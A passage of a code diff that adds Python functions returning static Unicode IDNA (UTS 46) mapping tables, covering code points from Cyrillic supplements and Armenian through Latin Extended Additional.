+ (0x501, 'V'), + (0x502, 'M', 'ԃ'), + ] + +def _seg_9() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x503, 'V'), + (0x504, 'M', 'ԅ'), + (0x505, 'V'), + (0x506, 'M', 'ԇ'), + (0x507, 'V'), + (0x508, 'M', 'ԉ'), + (0x509, 'V'), + (0x50A, 'M', 'ԋ'), + (0x50B, 'V'), + (0x50C, 'M', 'ԍ'), + (0x50D, 'V'), + (0x50E, 'M', 'ԏ'), + (0x50F, 'V'), + (0x510, 'M', 'ԑ'), + (0x511, 'V'), + (0x512, 'M', 'ԓ'), + (0x513, 'V'), + (0x514, 'M', 'ԕ'), + (0x515, 'V'), + (0x516, 'M', 'ԗ'), + (0x517, 'V'), + (0x518, 'M', 'ԙ'), + (0x519, 'V'), + (0x51A, 'M', 'ԛ'), + (0x51B, 'V'), + (0x51C, 'M', 'ԝ'), + (0x51D, 'V'), + (0x51E, 'M', 'ԟ'), + (0x51F, 'V'), + (0x520, 'M', 'ԡ'), + (0x521, 'V'), + (0x522, 'M', 'ԣ'), + (0x523, 'V'), + (0x524, 'M', 'ԥ'), + (0x525, 'V'), + (0x526, 
'M', 'ԧ'), + (0x527, 'V'), + (0x528, 'M', 'ԩ'), + (0x529, 'V'), + (0x52A, 'M', 'ԫ'), + (0x52B, 'V'), + (0x52C, 'M', 'ԭ'), + (0x52D, 'V'), + (0x52E, 'M', 'ԯ'), + (0x52F, 'V'), + (0x530, 'X'), + (0x531, 'M', 'ա'), + (0x532, 'M', 'բ'), + (0x533, 'M', 'գ'), + (0x534, 'M', 'դ'), + (0x535, 'M', 'ե'), + (0x536, 'M', 'զ'), + (0x537, 'M', 'է'), + (0x538, 'M', 'ը'), + (0x539, 'M', 'թ'), + (0x53A, 'M', 'ժ'), + (0x53B, 'M', 'ի'), + (0x53C, 'M', 'լ'), + (0x53D, 'M', 'խ'), + (0x53E, 'M', 'ծ'), + (0x53F, 'M', 'կ'), + (0x540, 'M', 'հ'), + (0x541, 'M', 'ձ'), + (0x542, 'M', 'ղ'), + (0x543, 'M', 'ճ'), + (0x544, 'M', 'մ'), + (0x545, 'M', 'յ'), + (0x546, 'M', 'ն'), + (0x547, 'M', 'շ'), + (0x548, 'M', 'ո'), + (0x549, 'M', 'չ'), + (0x54A, 'M', 'պ'), + (0x54B, 'M', 'ջ'), + (0x54C, 'M', 'ռ'), + (0x54D, 'M', 'ս'), + (0x54E, 'M', 'վ'), + (0x54F, 'M', 'տ'), + (0x550, 'M', 'ր'), + (0x551, 'M', 'ց'), + (0x552, 'M', 'ւ'), + (0x553, 'M', 'փ'), + (0x554, 'M', 'ք'), + (0x555, 'M', 'օ'), + (0x556, 'M', 'ֆ'), + (0x557, 'X'), + (0x559, 'V'), + (0x587, 'M', 'եւ'), + (0x588, 'V'), + (0x58B, 'X'), + (0x58D, 'V'), + (0x590, 'X'), + (0x591, 'V'), + (0x5C8, 'X'), + (0x5D0, 'V'), + (0x5EB, 'X'), + (0x5EF, 'V'), + (0x5F5, 'X'), + (0x606, 'V'), + (0x61C, 'X'), + (0x61D, 'V'), + ] + +def _seg_10() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x675, 'M', 'اٴ'), + (0x676, 'M', 'وٴ'), + (0x677, 'M', 'ۇٴ'), + (0x678, 'M', 'يٴ'), + (0x679, 'V'), + (0x6DD, 'X'), + (0x6DE, 'V'), + (0x70E, 'X'), + (0x710, 'V'), + (0x74B, 'X'), + (0x74D, 'V'), + (0x7B2, 'X'), + (0x7C0, 'V'), + (0x7FB, 'X'), + (0x7FD, 'V'), + (0x82E, 'X'), + (0x830, 'V'), + (0x83F, 'X'), + (0x840, 'V'), + (0x85C, 'X'), + (0x85E, 'V'), + (0x85F, 'X'), + (0x860, 'V'), + (0x86B, 'X'), + (0x870, 'V'), + (0x88F, 'X'), + (0x898, 'V'), + (0x8E2, 'X'), + (0x8E3, 'V'), + (0x958, 'M', 'क़'), + (0x959, 'M', 'ख़'), + (0x95A, 'M', 'ग़'), + (0x95B, 'M', 'ज़'), + (0x95C, 'M', 'ड़'), + (0x95D, 'M', 'ढ़'), + (0x95E, 'M', 'फ़'), + (0x95F, 'M', 'य़'), + (0x960, 'V'), + (0x984, 'X'), + (0x985, 'V'), + (0x98D, 'X'), + (0x98F, 'V'), + (0x991, 'X'), + (0x993, 'V'), + (0x9A9, 'X'), + (0x9AA, 'V'), + (0x9B1, 'X'), + (0x9B2, 'V'), + (0x9B3, 'X'), + (0x9B6, 'V'), + (0x9BA, 'X'), + (0x9BC, 'V'), + (0x9C5, 'X'), + (0x9C7, 'V'), + (0x9C9, 'X'), + (0x9CB, 'V'), + (0x9CF, 'X'), + (0x9D7, 'V'), + (0x9D8, 'X'), + (0x9DC, 'M', 'ড়'), + (0x9DD, 'M', 'ঢ়'), + (0x9DE, 'X'), + (0x9DF, 'M', 'য়'), + (0x9E0, 'V'), + (0x9E4, 'X'), + (0x9E6, 'V'), + (0x9FF, 'X'), + (0xA01, 'V'), + (0xA04, 'X'), + (0xA05, 'V'), + (0xA0B, 'X'), + (0xA0F, 'V'), + (0xA11, 'X'), + (0xA13, 'V'), + (0xA29, 'X'), + (0xA2A, 'V'), + (0xA31, 'X'), + (0xA32, 'V'), + (0xA33, 'M', 'ਲ਼'), + (0xA34, 'X'), + (0xA35, 'V'), + (0xA36, 'M', 'ਸ਼'), + (0xA37, 'X'), + (0xA38, 'V'), + (0xA3A, 'X'), + (0xA3C, 'V'), + (0xA3D, 'X'), + (0xA3E, 'V'), + (0xA43, 'X'), + (0xA47, 'V'), + (0xA49, 'X'), + (0xA4B, 'V'), + (0xA4E, 'X'), + (0xA51, 'V'), + (0xA52, 'X'), + (0xA59, 'M', 'ਖ਼'), + (0xA5A, 'M', 'ਗ਼'), + (0xA5B, 'M', 'ਜ਼'), + (0xA5C, 'V'), + (0xA5D, 'X'), + ] + +def _seg_11() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xA5E, 'M', 'ਫ਼'), + (0xA5F, 'X'), + (0xA66, 'V'), + (0xA77, 'X'), + (0xA81, 'V'), + (0xA84, 'X'), + (0xA85, 'V'), + (0xA8E, 'X'), + (0xA8F, 'V'), + (0xA92, 'X'), + (0xA93, 'V'), + (0xAA9, 'X'), + (0xAAA, 'V'), + (0xAB1, 'X'), + (0xAB2, 'V'), + (0xAB4, 'X'), + (0xAB5, 'V'), + (0xABA, 'X'), + (0xABC, 'V'), + (0xAC6, 'X'), + (0xAC7, 'V'), + (0xACA, 'X'), + (0xACB, 'V'), + (0xACE, 'X'), + (0xAD0, 'V'), + 
(0xAD1, 'X'), + (0xAE0, 'V'), + (0xAE4, 'X'), + (0xAE6, 'V'), + (0xAF2, 'X'), + (0xAF9, 'V'), + (0xB00, 'X'), + (0xB01, 'V'), + (0xB04, 'X'), + (0xB05, 'V'), + (0xB0D, 'X'), + (0xB0F, 'V'), + (0xB11, 'X'), + (0xB13, 'V'), + (0xB29, 'X'), + (0xB2A, 'V'), + (0xB31, 'X'), + (0xB32, 'V'), + (0xB34, 'X'), + (0xB35, 'V'), + (0xB3A, 'X'), + (0xB3C, 'V'), + (0xB45, 'X'), + (0xB47, 'V'), + (0xB49, 'X'), + (0xB4B, 'V'), + (0xB4E, 'X'), + (0xB55, 'V'), + (0xB58, 'X'), + (0xB5C, 'M', 'ଡ଼'), + (0xB5D, 'M', 'ଢ଼'), + (0xB5E, 'X'), + (0xB5F, 'V'), + (0xB64, 'X'), + (0xB66, 'V'), + (0xB78, 'X'), + (0xB82, 'V'), + (0xB84, 'X'), + (0xB85, 'V'), + (0xB8B, 'X'), + (0xB8E, 'V'), + (0xB91, 'X'), + (0xB92, 'V'), + (0xB96, 'X'), + (0xB99, 'V'), + (0xB9B, 'X'), + (0xB9C, 'V'), + (0xB9D, 'X'), + (0xB9E, 'V'), + (0xBA0, 'X'), + (0xBA3, 'V'), + (0xBA5, 'X'), + (0xBA8, 'V'), + (0xBAB, 'X'), + (0xBAE, 'V'), + (0xBBA, 'X'), + (0xBBE, 'V'), + (0xBC3, 'X'), + (0xBC6, 'V'), + (0xBC9, 'X'), + (0xBCA, 'V'), + (0xBCE, 'X'), + (0xBD0, 'V'), + (0xBD1, 'X'), + (0xBD7, 'V'), + (0xBD8, 'X'), + (0xBE6, 'V'), + (0xBFB, 'X'), + (0xC00, 'V'), + (0xC0D, 'X'), + (0xC0E, 'V'), + (0xC11, 'X'), + (0xC12, 'V'), + (0xC29, 'X'), + (0xC2A, 'V'), + ] + +def _seg_12() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xC3A, 'X'), + (0xC3C, 'V'), + (0xC45, 'X'), + (0xC46, 'V'), + (0xC49, 'X'), + (0xC4A, 'V'), + (0xC4E, 'X'), + (0xC55, 'V'), + (0xC57, 'X'), + (0xC58, 'V'), + (0xC5B, 'X'), + (0xC5D, 'V'), + (0xC5E, 'X'), + (0xC60, 'V'), + (0xC64, 'X'), + (0xC66, 'V'), + (0xC70, 'X'), + (0xC77, 'V'), + (0xC8D, 'X'), + (0xC8E, 'V'), + (0xC91, 'X'), + (0xC92, 'V'), + (0xCA9, 'X'), + (0xCAA, 'V'), + (0xCB4, 'X'), + (0xCB5, 'V'), + (0xCBA, 'X'), + (0xCBC, 'V'), + (0xCC5, 'X'), + (0xCC6, 'V'), + (0xCC9, 'X'), + (0xCCA, 'V'), + (0xCCE, 'X'), + (0xCD5, 'V'), + (0xCD7, 'X'), + (0xCDD, 'V'), + (0xCDF, 'X'), + (0xCE0, 'V'), + (0xCE4, 'X'), + (0xCE6, 'V'), + (0xCF0, 'X'), + (0xCF1, 'V'), + (0xCF3, 'X'), + (0xD00, 'V'), + (0xD0D, 'X'), + (0xD0E, 'V'), + (0xD11, 'X'), + (0xD12, 'V'), + (0xD45, 'X'), + (0xD46, 'V'), + (0xD49, 'X'), + (0xD4A, 'V'), + (0xD50, 'X'), + (0xD54, 'V'), + (0xD64, 'X'), + (0xD66, 'V'), + (0xD80, 'X'), + (0xD81, 'V'), + (0xD84, 'X'), + (0xD85, 'V'), + (0xD97, 'X'), + (0xD9A, 'V'), + (0xDB2, 'X'), + (0xDB3, 'V'), + (0xDBC, 'X'), + (0xDBD, 'V'), + (0xDBE, 'X'), + (0xDC0, 'V'), + (0xDC7, 'X'), + (0xDCA, 'V'), + (0xDCB, 'X'), + (0xDCF, 'V'), + (0xDD5, 'X'), + (0xDD6, 'V'), + (0xDD7, 'X'), + (0xDD8, 'V'), + (0xDE0, 'X'), + (0xDE6, 'V'), + (0xDF0, 'X'), + (0xDF2, 'V'), + (0xDF5, 'X'), + (0xE01, 'V'), + (0xE33, 'M', 'ํา'), + (0xE34, 'V'), + (0xE3B, 'X'), + (0xE3F, 'V'), + (0xE5C, 'X'), + (0xE81, 'V'), + (0xE83, 'X'), + (0xE84, 'V'), + (0xE85, 'X'), + (0xE86, 'V'), + (0xE8B, 'X'), + (0xE8C, 'V'), + (0xEA4, 'X'), + (0xEA5, 'V'), + (0xEA6, 'X'), + (0xEA7, 'V'), + (0xEB3, 'M', 'ໍາ'), + (0xEB4, 'V'), + ] + +def _seg_13() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xEBE, 'X'), + (0xEC0, 'V'), + (0xEC5, 'X'), + (0xEC6, 'V'), + (0xEC7, 'X'), + (0xEC8, 'V'), + (0xECE, 'X'), + (0xED0, 'V'), + (0xEDA, 'X'), + (0xEDC, 'M', 'ຫນ'), + (0xEDD, 'M', 'ຫມ'), + (0xEDE, 'V'), + (0xEE0, 'X'), + (0xF00, 'V'), + (0xF0C, 'M', '་'), + (0xF0D, 'V'), + (0xF43, 'M', 'གྷ'), + (0xF44, 'V'), + (0xF48, 'X'), + (0xF49, 'V'), + (0xF4D, 'M', 'ཌྷ'), + (0xF4E, 'V'), + (0xF52, 'M', 'དྷ'), + (0xF53, 'V'), + (0xF57, 'M', 'བྷ'), + (0xF58, 'V'), + (0xF5C, 'M', 'ཛྷ'), + (0xF5D, 'V'), + (0xF69, 'M', 'ཀྵ'), + (0xF6A, 'V'), + (0xF6D, 'X'), + (0xF71, 
'V'), + (0xF73, 'M', 'ཱི'), + (0xF74, 'V'), + (0xF75, 'M', 'ཱུ'), + (0xF76, 'M', 'ྲྀ'), + (0xF77, 'M', 'ྲཱྀ'), + (0xF78, 'M', 'ླྀ'), + (0xF79, 'M', 'ླཱྀ'), + (0xF7A, 'V'), + (0xF81, 'M', 'ཱྀ'), + (0xF82, 'V'), + (0xF93, 'M', 'ྒྷ'), + (0xF94, 'V'), + (0xF98, 'X'), + (0xF99, 'V'), + (0xF9D, 'M', 'ྜྷ'), + (0xF9E, 'V'), + (0xFA2, 'M', 'ྡྷ'), + (0xFA3, 'V'), + (0xFA7, 'M', 'ྦྷ'), + (0xFA8, 'V'), + (0xFAC, 'M', 'ྫྷ'), + (0xFAD, 'V'), + (0xFB9, 'M', 'ྐྵ'), + (0xFBA, 'V'), + (0xFBD, 'X'), + (0xFBE, 'V'), + (0xFCD, 'X'), + (0xFCE, 'V'), + (0xFDB, 'X'), + (0x1000, 'V'), + (0x10A0, 'X'), + (0x10C7, 'M', 'ⴧ'), + (0x10C8, 'X'), + (0x10CD, 'M', 'ⴭ'), + (0x10CE, 'X'), + (0x10D0, 'V'), + (0x10FC, 'M', 'ნ'), + (0x10FD, 'V'), + (0x115F, 'X'), + (0x1161, 'V'), + (0x1249, 'X'), + (0x124A, 'V'), + (0x124E, 'X'), + (0x1250, 'V'), + (0x1257, 'X'), + (0x1258, 'V'), + (0x1259, 'X'), + (0x125A, 'V'), + (0x125E, 'X'), + (0x1260, 'V'), + (0x1289, 'X'), + (0x128A, 'V'), + (0x128E, 'X'), + (0x1290, 'V'), + (0x12B1, 'X'), + (0x12B2, 'V'), + (0x12B6, 'X'), + (0x12B8, 'V'), + (0x12BF, 'X'), + (0x12C0, 'V'), + (0x12C1, 'X'), + (0x12C2, 'V'), + (0x12C6, 'X'), + (0x12C8, 'V'), + (0x12D7, 'X'), + (0x12D8, 'V'), + (0x1311, 'X'), + (0x1312, 'V'), + ] + +def _seg_14() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1316, 'X'), + (0x1318, 'V'), + (0x135B, 'X'), + (0x135D, 'V'), + (0x137D, 'X'), + (0x1380, 'V'), + (0x139A, 'X'), + (0x13A0, 'V'), + (0x13F6, 'X'), + (0x13F8, 'M', 'Ᏸ'), + (0x13F9, 'M', 'Ᏹ'), + (0x13FA, 'M', 'Ᏺ'), + (0x13FB, 'M', 'Ᏻ'), + (0x13FC, 'M', 'Ᏼ'), + (0x13FD, 'M', 'Ᏽ'), + (0x13FE, 'X'), + (0x1400, 'V'), + (0x1680, 'X'), + (0x1681, 'V'), + (0x169D, 'X'), + (0x16A0, 'V'), + (0x16F9, 'X'), + (0x1700, 'V'), + (0x1716, 'X'), + (0x171F, 'V'), + (0x1737, 'X'), + (0x1740, 'V'), + (0x1754, 'X'), + (0x1760, 'V'), + (0x176D, 'X'), + (0x176E, 'V'), + (0x1771, 'X'), + (0x1772, 'V'), + (0x1774, 'X'), + (0x1780, 'V'), + (0x17B4, 'X'), + (0x17B6, 'V'), + (0x17DE, 'X'), + (0x17E0, 'V'), + (0x17EA, 'X'), + (0x17F0, 'V'), + (0x17FA, 'X'), + (0x1800, 'V'), + (0x1806, 'X'), + (0x1807, 'V'), + (0x180B, 'I'), + (0x180E, 'X'), + (0x180F, 'I'), + (0x1810, 'V'), + (0x181A, 'X'), + (0x1820, 'V'), + (0x1879, 'X'), + (0x1880, 'V'), + (0x18AB, 'X'), + (0x18B0, 'V'), + (0x18F6, 'X'), + (0x1900, 'V'), + (0x191F, 'X'), + (0x1920, 'V'), + (0x192C, 'X'), + (0x1930, 'V'), + (0x193C, 'X'), + (0x1940, 'V'), + (0x1941, 'X'), + (0x1944, 'V'), + (0x196E, 'X'), + (0x1970, 'V'), + (0x1975, 'X'), + (0x1980, 'V'), + (0x19AC, 'X'), + (0x19B0, 'V'), + (0x19CA, 'X'), + (0x19D0, 'V'), + (0x19DB, 'X'), + (0x19DE, 'V'), + (0x1A1C, 'X'), + (0x1A1E, 'V'), + (0x1A5F, 'X'), + (0x1A60, 'V'), + (0x1A7D, 'X'), + (0x1A7F, 'V'), + (0x1A8A, 'X'), + (0x1A90, 'V'), + (0x1A9A, 'X'), + (0x1AA0, 'V'), + (0x1AAE, 'X'), + (0x1AB0, 'V'), + (0x1ACF, 'X'), + (0x1B00, 'V'), + (0x1B4D, 'X'), + (0x1B50, 'V'), + (0x1B7F, 'X'), + (0x1B80, 'V'), + (0x1BF4, 'X'), + (0x1BFC, 'V'), + (0x1C38, 'X'), + (0x1C3B, 'V'), + (0x1C4A, 'X'), + (0x1C4D, 'V'), + (0x1C80, 'M', 'в'), + ] + +def _seg_15() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1C81, 'M', 'д'), + (0x1C82, 'M', 'о'), + (0x1C83, 'M', 'с'), + (0x1C84, 'M', 'т'), + (0x1C86, 'M', 'ъ'), + (0x1C87, 'M', 'ѣ'), + (0x1C88, 'M', 'ꙋ'), + (0x1C89, 'X'), + (0x1C90, 'M', 'ა'), + (0x1C91, 'M', 'ბ'), + (0x1C92, 'M', 'გ'), + (0x1C93, 'M', 'დ'), + (0x1C94, 'M', 'ე'), + (0x1C95, 'M', 'ვ'), + (0x1C96, 'M', 'ზ'), + (0x1C97, 'M', 'თ'), + (0x1C98, 'M', 'ი'), + (0x1C99, 'M', 'კ'), + (0x1C9A, 'M', 'ლ'), + 
(0x1C9B, 'M', 'მ'), + (0x1C9C, 'M', 'ნ'), + (0x1C9D, 'M', 'ო'), + (0x1C9E, 'M', 'პ'), + (0x1C9F, 'M', 'ჟ'), + (0x1CA0, 'M', 'რ'), + (0x1CA1, 'M', 'ს'), + (0x1CA2, 'M', 'ტ'), + (0x1CA3, 'M', 'უ'), + (0x1CA4, 'M', 'ფ'), + (0x1CA5, 'M', 'ქ'), + (0x1CA6, 'M', 'ღ'), + (0x1CA7, 'M', 'ყ'), + (0x1CA8, 'M', 'შ'), + (0x1CA9, 'M', 'ჩ'), + (0x1CAA, 'M', 'ც'), + (0x1CAB, 'M', 'ძ'), + (0x1CAC, 'M', 'წ'), + (0x1CAD, 'M', 'ჭ'), + (0x1CAE, 'M', 'ხ'), + (0x1CAF, 'M', 'ჯ'), + (0x1CB0, 'M', 'ჰ'), + (0x1CB1, 'M', 'ჱ'), + (0x1CB2, 'M', 'ჲ'), + (0x1CB3, 'M', 'ჳ'), + (0x1CB4, 'M', 'ჴ'), + (0x1CB5, 'M', 'ჵ'), + (0x1CB6, 'M', 'ჶ'), + (0x1CB7, 'M', 'ჷ'), + (0x1CB8, 'M', 'ჸ'), + (0x1CB9, 'M', 'ჹ'), + (0x1CBA, 'M', 'ჺ'), + (0x1CBB, 'X'), + (0x1CBD, 'M', 'ჽ'), + (0x1CBE, 'M', 'ჾ'), + (0x1CBF, 'M', 'ჿ'), + (0x1CC0, 'V'), + (0x1CC8, 'X'), + (0x1CD0, 'V'), + (0x1CFB, 'X'), + (0x1D00, 'V'), + (0x1D2C, 'M', 'a'), + (0x1D2D, 'M', 'æ'), + (0x1D2E, 'M', 'b'), + (0x1D2F, 'V'), + (0x1D30, 'M', 'd'), + (0x1D31, 'M', 'e'), + (0x1D32, 'M', 'ǝ'), + (0x1D33, 'M', 'g'), + (0x1D34, 'M', 'h'), + (0x1D35, 'M', 'i'), + (0x1D36, 'M', 'j'), + (0x1D37, 'M', 'k'), + (0x1D38, 'M', 'l'), + (0x1D39, 'M', 'm'), + (0x1D3A, 'M', 'n'), + (0x1D3B, 'V'), + (0x1D3C, 'M', 'o'), + (0x1D3D, 'M', 'ȣ'), + (0x1D3E, 'M', 'p'), + (0x1D3F, 'M', 'r'), + (0x1D40, 'M', 't'), + (0x1D41, 'M', 'u'), + (0x1D42, 'M', 'w'), + (0x1D43, 'M', 'a'), + (0x1D44, 'M', 'ɐ'), + (0x1D45, 'M', 'ɑ'), + (0x1D46, 'M', 'ᴂ'), + (0x1D47, 'M', 'b'), + (0x1D48, 'M', 'd'), + (0x1D49, 'M', 'e'), + (0x1D4A, 'M', 'ə'), + (0x1D4B, 'M', 'ɛ'), + (0x1D4C, 'M', 'ɜ'), + (0x1D4D, 'M', 'g'), + (0x1D4E, 'V'), + (0x1D4F, 'M', 'k'), + (0x1D50, 'M', 'm'), + (0x1D51, 'M', 'ŋ'), + (0x1D52, 'M', 'o'), + (0x1D53, 'M', 'ɔ'), + ] + +def _seg_16() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D54, 'M', 'ᴖ'), + (0x1D55, 'M', 'ᴗ'), + (0x1D56, 'M', 'p'), + (0x1D57, 'M', 't'), + (0x1D58, 'M', 'u'), + (0x1D59, 'M', 'ᴝ'), + (0x1D5A, 'M', 'ɯ'), + (0x1D5B, 'M', 'v'), + (0x1D5C, 'M', 'ᴥ'), + (0x1D5D, 'M', 'β'), + (0x1D5E, 'M', 'γ'), + (0x1D5F, 'M', 'δ'), + (0x1D60, 'M', 'φ'), + (0x1D61, 'M', 'χ'), + (0x1D62, 'M', 'i'), + (0x1D63, 'M', 'r'), + (0x1D64, 'M', 'u'), + (0x1D65, 'M', 'v'), + (0x1D66, 'M', 'β'), + (0x1D67, 'M', 'γ'), + (0x1D68, 'M', 'ρ'), + (0x1D69, 'M', 'φ'), + (0x1D6A, 'M', 'χ'), + (0x1D6B, 'V'), + (0x1D78, 'M', 'н'), + (0x1D79, 'V'), + (0x1D9B, 'M', 'ɒ'), + (0x1D9C, 'M', 'c'), + (0x1D9D, 'M', 'ɕ'), + (0x1D9E, 'M', 'ð'), + (0x1D9F, 'M', 'ɜ'), + (0x1DA0, 'M', 'f'), + (0x1DA1, 'M', 'ɟ'), + (0x1DA2, 'M', 'ɡ'), + (0x1DA3, 'M', 'ɥ'), + (0x1DA4, 'M', 'ɨ'), + (0x1DA5, 'M', 'ɩ'), + (0x1DA6, 'M', 'ɪ'), + (0x1DA7, 'M', 'ᵻ'), + (0x1DA8, 'M', 'ʝ'), + (0x1DA9, 'M', 'ɭ'), + (0x1DAA, 'M', 'ᶅ'), + (0x1DAB, 'M', 'ʟ'), + (0x1DAC, 'M', 'ɱ'), + (0x1DAD, 'M', 'ɰ'), + (0x1DAE, 'M', 'ɲ'), + (0x1DAF, 'M', 'ɳ'), + (0x1DB0, 'M', 'ɴ'), + (0x1DB1, 'M', 'ɵ'), + (0x1DB2, 'M', 'ɸ'), + (0x1DB3, 'M', 'ʂ'), + (0x1DB4, 'M', 'ʃ'), + (0x1DB5, 'M', 'ƫ'), + (0x1DB6, 'M', 'ʉ'), + (0x1DB7, 'M', 'ʊ'), + (0x1DB8, 'M', 'ᴜ'), + (0x1DB9, 'M', 'ʋ'), + (0x1DBA, 'M', 'ʌ'), + (0x1DBB, 'M', 'z'), + (0x1DBC, 'M', 'ʐ'), + (0x1DBD, 'M', 'ʑ'), + (0x1DBE, 'M', 'ʒ'), + (0x1DBF, 'M', 'θ'), + (0x1DC0, 'V'), + (0x1E00, 'M', 'ḁ'), + (0x1E01, 'V'), + (0x1E02, 'M', 'ḃ'), + (0x1E03, 'V'), + (0x1E04, 'M', 'ḅ'), + (0x1E05, 'V'), + (0x1E06, 'M', 'ḇ'), + (0x1E07, 'V'), + (0x1E08, 'M', 'ḉ'), + (0x1E09, 'V'), + (0x1E0A, 'M', 'ḋ'), + (0x1E0B, 'V'), + (0x1E0C, 'M', 'ḍ'), + (0x1E0D, 'V'), + (0x1E0E, 'M', 'ḏ'), + (0x1E0F, 'V'), + (0x1E10, 'M', 'ḑ'), + 
(0x1E11, 'V'), + (0x1E12, 'M', 'ḓ'), + (0x1E13, 'V'), + (0x1E14, 'M', 'ḕ'), + (0x1E15, 'V'), + (0x1E16, 'M', 'ḗ'), + (0x1E17, 'V'), + (0x1E18, 'M', 'ḙ'), + (0x1E19, 'V'), + (0x1E1A, 'M', 'ḛ'), + (0x1E1B, 'V'), + (0x1E1C, 'M', 'ḝ'), + (0x1E1D, 'V'), + (0x1E1E, 'M', 'ḟ'), + (0x1E1F, 'V'), + (0x1E20, 'M', 'ḡ'), + (0x1E21, 'V'), + (0x1E22, 'M', 'ḣ'), + (0x1E23, 'V'), + ] + +def _seg_17() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1E24, 'M', 'ḥ'), + (0x1E25, 'V'), + (0x1E26, 'M', 'ḧ'), + (0x1E27, 'V'), + (0x1E28, 'M', 'ḩ'), + (0x1E29, 'V'), + (0x1E2A, 'M', 'ḫ'), + (0x1E2B, 'V'), + (0x1E2C, 'M', 'ḭ'), + (0x1E2D, 'V'), + (0x1E2E, 'M', 'ḯ'), + (0x1E2F, 'V'), + (0x1E30, 'M', 'ḱ'), + (0x1E31, 'V'), + (0x1E32, 'M', 'ḳ'), + (0x1E33, 'V'), + (0x1E34, 'M', 'ḵ'), + (0x1E35, 'V'), + (0x1E36, 'M', 'ḷ'), + (0x1E37, 'V'), + (0x1E38, 'M', 'ḹ'), + (0x1E39, 'V'), + (0x1E3A, 'M', 'ḻ'), + (0x1E3B, 'V'), + (0x1E3C, 'M', 'ḽ'), + (0x1E3D, 'V'), + (0x1E3E, 'M', 'ḿ'), + (0x1E3F, 'V'), + (0x1E40, 'M', 'ṁ'), + (0x1E41, 'V'), + (0x1E42, 'M', 'ṃ'), + (0x1E43, 'V'), + (0x1E44, 'M', 'ṅ'), + (0x1E45, 'V'), + (0x1E46, 'M', 'ṇ'), + (0x1E47, 'V'), + (0x1E48, 'M', 'ṉ'), + (0x1E49, 'V'), + (0x1E4A, 'M', 'ṋ'), + (0x1E4B, 'V'), + (0x1E4C, 'M', 'ṍ'), + (0x1E4D, 'V'), + (0x1E4E, 'M', 'ṏ'), + (0x1E4F, 'V'), + (0x1E50, 'M', 'ṑ'), + (0x1E51, 'V'), + (0x1E52, 'M', 'ṓ'), + (0x1E53, 'V'), + (0x1E54, 'M', 'ṕ'), + (0x1E55, 'V'), + (0x1E56, 'M', 'ṗ'), + (0x1E57, 'V'), + (0x1E58, 'M', 'ṙ'), + (0x1E59, 'V'), + (0x1E5A, 'M', 'ṛ'), + (0x1E5B, 'V'), + (0x1E5C, 'M', 'ṝ'), + (0x1E5D, 'V'), + (0x1E5E, 'M', 'ṟ'), + (0x1E5F, 'V'), + (0x1E60, 'M', 'ṡ'), + (0x1E61, 'V'), + (0x1E62, 'M', 'ṣ'), + (0x1E63, 'V'), + (0x1E64, 'M', 'ṥ'), + (0x1E65, 'V'), + (0x1E66, 'M', 'ṧ'), + (0x1E67, 'V'), + (0x1E68, 'M', 'ṩ'), + (0x1E69, 'V'), + (0x1E6A, 'M', 'ṫ'), + (0x1E6B, 'V'), + (0x1E6C, 'M', 'ṭ'), + (0x1E6D, 'V'), + (0x1E6E, 'M', 'ṯ'), + (0x1E6F, 'V'), + (0x1E70, 'M', 'ṱ'), + (0x1E71, 'V'), + (0x1E72, 'M', 'ṳ'), + (0x1E73, 'V'), + (0x1E74, 'M', 'ṵ'), + (0x1E75, 'V'), + (0x1E76, 'M', 'ṷ'), + (0x1E77, 'V'), + (0x1E78, 'M', 'ṹ'), + (0x1E79, 'V'), + (0x1E7A, 'M', 'ṻ'), + (0x1E7B, 'V'), + (0x1E7C, 'M', 'ṽ'), + (0x1E7D, 'V'), + (0x1E7E, 'M', 'ṿ'), + (0x1E7F, 'V'), + (0x1E80, 'M', 'ẁ'), + (0x1E81, 'V'), + (0x1E82, 'M', 'ẃ'), + (0x1E83, 'V'), + (0x1E84, 'M', 'ẅ'), + (0x1E85, 'V'), + (0x1E86, 'M', 'ẇ'), + (0x1E87, 'V'), + ] + +def _seg_18() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1E88, 'M', 'ẉ'), + (0x1E89, 'V'), + (0x1E8A, 'M', 'ẋ'), + (0x1E8B, 'V'), + (0x1E8C, 'M', 'ẍ'), + (0x1E8D, 'V'), + (0x1E8E, 'M', 'ẏ'), + (0x1E8F, 'V'), + (0x1E90, 'M', 'ẑ'), + (0x1E91, 'V'), + (0x1E92, 'M', 'ẓ'), + (0x1E93, 'V'), + (0x1E94, 'M', 'ẕ'), + (0x1E95, 'V'), + (0x1E9A, 'M', 'aʾ'), + (0x1E9B, 'M', 'ṡ'), + (0x1E9C, 'V'), + (0x1E9E, 'M', 'ss'), + (0x1E9F, 'V'), + (0x1EA0, 'M', 'ạ'), + (0x1EA1, 'V'), + (0x1EA2, 'M', 'ả'), + (0x1EA3, 'V'), + (0x1EA4, 'M', 'ấ'), + (0x1EA5, 'V'), + (0x1EA6, 'M', 'ầ'), + (0x1EA7, 'V'), + (0x1EA8, 'M', 'ẩ'), + (0x1EA9, 'V'), + (0x1EAA, 'M', 'ẫ'), + (0x1EAB, 'V'), + (0x1EAC, 'M', 'ậ'), + (0x1EAD, 'V'), + (0x1EAE, 'M', 'ắ'), + (0x1EAF, 'V'), + (0x1EB0, 'M', 'ằ'), + (0x1EB1, 'V'), + (0x1EB2, 'M', 'ẳ'), + (0x1EB3, 'V'), + (0x1EB4, 'M', 'ẵ'), + (0x1EB5, 'V'), + (0x1EB6, 'M', 'ặ'), + (0x1EB7, 'V'), + (0x1EB8, 'M', 'ẹ'), + (0x1EB9, 'V'), + (0x1EBA, 'M', 'ẻ'), + (0x1EBB, 'V'), + (0x1EBC, 'M', 'ẽ'), + (0x1EBD, 'V'), + (0x1EBE, 'M', 'ế'), + (0x1EBF, 'V'), + (0x1EC0, 'M', 